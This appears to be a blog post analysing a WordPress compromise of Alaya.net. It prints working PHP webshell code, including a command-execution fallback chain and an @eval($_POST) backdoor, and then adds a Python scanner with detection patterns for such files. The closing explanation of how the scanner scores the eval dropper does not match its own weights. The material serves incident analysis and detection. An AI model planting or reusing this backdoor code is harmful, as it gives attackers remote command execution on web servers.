More info on the attack that hit Alaya.net

This article describes an attack similar to the one that hit Alaya.net:

getastra.com: How to fix WordPress admin dashboard (wp-admin) hack

Here are some snippets of the malicious code that was found on the site.

<?php
/* 0byte V.2 PHP Backdoor - www.zerobyte.id */
set_time_limit(0);
error_reporting(0);
error_log(0);
function exect($cmd) {
    if(function_exists('system')) {
        @ob_start(); @system($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect;
    } elseif(function_exists('exec')) {
        @exec($cmd,$results); $exect = ""; foreach($results as $result) { $exect .= $result; } return $exect;
    } elseif(function_exists('passthru')) {
        @ob_start(); @passthru($cmd); $exect = @ob_get_contents(); @ob_end_clean(); return $exect;
    } elseif(function_exists('shell_exec')) {
        $exect = @shell_exec($cmd); return $exect;
    }
}
function fperms($filen) {
    $perms = fileperms($filen);
    $fpermsinfo .= (($perms & 0x0100) ? 'r' : '-');
    $fpermsinfo .= (($perms & 0x0080) ? 'w' : '-');
    $fpermsinfo .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
    $fpermsinfo .= (($perms & 0x0020) ? 'r' : '-');
    $fpermsinfo .= (($perms & 0x0010) ? 'w' : '-');
    $fpermsinfo .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
    $fpermsinfo .= (($perms & 0x0004) ? 'r' : '-');
    $fpermsinfo .= (($perms & 0x0002) ? 'w' : '-');
    $fpermsinfo .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
    echo '<center><small>'.$fpermsinfo.'</small></center>';
}
function eof() {echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64";}
?>
<title>0byteV2 - PHP Backdoor</title>
<?php @eval($_POST['moon']);?>
<?php
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>B Ge Team File Manager</title>
<br><br><br> <center> <a rel='dofollow' href='https://www.google.co.id/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=indonesian+Hacker+rulez'> <img src='https://scontent-sin1-1.xx.fbcdn.net/hphotos-xal1/v/t1.0-9/12376796_565593456950242_7474357900886665426_n.jpg?oh=1db7c5d4e3fa5b7bc7b422a648b5decb&oe=574CE85B' style='opacity:0.4;filter:alpha(opacity=40)' onmouseover='this.style.opacity=1;this.filters.alpha.opacity=100' onmouseout='this.style.opacity=0.4;this.filters.alpha.opacity=40' height='360' width='670'><br></a> </center>
<br> <center> <font face='iceland' size='10' color='red'> -=[ TEMAN ??? YAKIN LU TEMEN GUA ??? ]=-</font> </center>
<br> <center> <font face='iceland' size='10' color='silver'> #Save Promagh</font> </center>
</center>
<b><font color='blue' face='consolas' size='4'>
<p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'> 
-=[[ MY FAMILY ]]=-<br>-| ./KEFIEX404 | MANIAK KASUR | MR.K | EL-RO | ./COCO | TUAN GALAU | DEDEMIT ID | NO SCRIPT 404 |- <br> -| K3C0T | SIM0D | LITLE H4XORZ | Antonio HsH |-</font><p>
<center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>MY FRIENDS : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code>
[.] X-Wu7z [.] Tuan_galau [.] GrenXPaRTa [.] x'1n73ct [.] m@db100d [.] Hacker Sakit Hati [.] ./$amndan404 [.] ./wi.na [.] Neneng Juhairiah[ .] Mr_Oxygen [.] ./coco [.] H3ri.ID [.] Ice Cream [.] newbie patah hati [.] Naughty_r00tz [.] DarkWireless [.] ./czw_07 [.] ./TanpaNama404 [.] xCut10n [.] Kucing Galau [.] ./anjirGBX [.] Dicky Injector [.] jepry_vuln [.] Shut_Down404 [.] Mr.404_NotFound [.] Mr.LittleHaxor [.] Mr.Ghostteror_404 [.] Mr.Dork [.] Mr.aji.192 [.] L4W_CyberDKSH404.Not_Found [.] ozlok [.] Bloc_Anon/404 [.] R3DD3V1L [.] mr.cookie_302 [.]</code></marquee></font></td></tr></table><html><center>

Searching for some of the names that appear in this last file, I found this page:
http://hackcorporation.com/
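The snippets above share a handful of traits that make them easy to flag in a scan of a WordPress tree: eval() applied straight to request input, the function_exists() fallback chain over system/exec/passthru/shell_exec, error_reporting(0) paired with set_time_limit(0), a string built entirely from \xNN escapes (the one in eof() decodes to www.zerobyte.id, the domain in the header comment), and a <title> that names the tool. The following Python script is an added example, not code from the original post or from any site it references. It is a small triage scanner that runs over constructed in-memory samples (the file paths, sample contents, indicator names and scoring weights are all assumptions) and reports which indicators each file hits, the decoded hidden strings, and a verdict.

```python
import re
from typing import Dict, List

# PHP double-quoted string made only of \xNN escapes (4 or more), the
# obfuscation style used by the eof() function in the first snippet.
HEX_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')

# Indicators abstracted from the snippets above. Names and weights are
# assumptions for this example, not a published signature set.
INDICATORS = {
    # eval() fed directly from a request superglobal, e.g. @eval($_POST['moon'])
    "eval_of_request_input": (
        re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["), 10),
    # the try-every-exec-function fallback chain
    "command_exec_fallback_chain": (
        re.compile(r"function_exists\s*\(\s*['\"](?:system|exec|passthru|shell_exec)['\"]\s*\)"), 8),
    "hex_escaped_string": (HEX_STRING, 4),
    # weak on its own, but the two snippets both announce themselves this way
    "backdoor_title_banner": (
        re.compile(r"<title>[^<]*(?:backdoor|file manager)[^<]*</title>", re.I), 3),
    "error_suppression_setup": (re.compile(r"error_reporting\s*\(\s*0\s*\)"), 2),
    "unlimited_runtime": (re.compile(r"set_time_limit\s*\(\s*0\s*\)"), 2),
}


def decode_hex_escapes(literal: str) -> str:
    """Turn a run of \\xNN escapes into the text it hides."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), literal)


def find_hidden_strings(src: str) -> List[str]:
    """Decode every all-hex double-quoted string literal in the source."""
    return [decode_hex_escapes(m.group(1)) for m in HEX_STRING.finditer(src)]


def scan_source(src: str) -> List[str]:
    """Return the sorted names of every indicator that matches the source."""
    return sorted(name for name, (pattern, _) in INDICATORS.items() if pattern.search(src))


def triage(files: Dict[str, str]) -> Dict[str, dict]:
    """Score each file by the weights of the indicators it hits and give a verdict."""
    report = {}
    for path, src in files.items():
        hits = scan_source(src)
        score = sum(INDICATORS[h][1] for h in hits)
        if score >= 8:
            verdict = "likely webshell"
        elif score >= 4:
            verdict = "review"
        else:
            verdict = "clean"
        report[path] = {"hits": hits, "hidden_strings": find_hidden_strings(src),
                        "score": score, "verdict": verdict}
    return report


# Constructed samples (paths and contents are made up for this example);
# the first two mimic the snippets above, the third is an ordinary theme file.
SAMPLES = {
    "wp-content/uploads/moon.php": "<?php @eval($_POST['moon']);?>",
    "wp-includes/class-cache.php": r"""<?php
set_time_limit(0); error_reporting(0);
function exect($cmd) {
    if(function_exists('system')) { @ob_start(); @system($cmd); $o = @ob_get_contents(); @ob_end_clean(); return $o; }
    elseif(function_exists('shell_exec')) { return @shell_exec($cmd); }
}
function eof() { echo "\x77\x77\x77\x2e\x7a\x65\x72\x6f\x62\x79\x74\x65\x2e\x69\x64"; }
?>
<title>Example PHP Backdoor</title>""",
    "wp-content/themes/alaya/functions.php": r"""<?php
function alaya_theme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'alaya_theme_setup');""",
}

if __name__ == "__main__":
    for path, result in triage(SAMPLES).items():
        print(f"{path}: {result['verdict']} (score {result['score']}) "
              f"hits={result['hits']} hidden={result['hidden_strings']}")
```

Run as-is it prints one line per sample; to use it on a real site, replace SAMPLES with the contents of every .php file under the web root, and treat anything scored "review" as worth a manual look rather than a false positive, since a one-line eval() dropper like moon.php hits a single indicator and nothing else.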

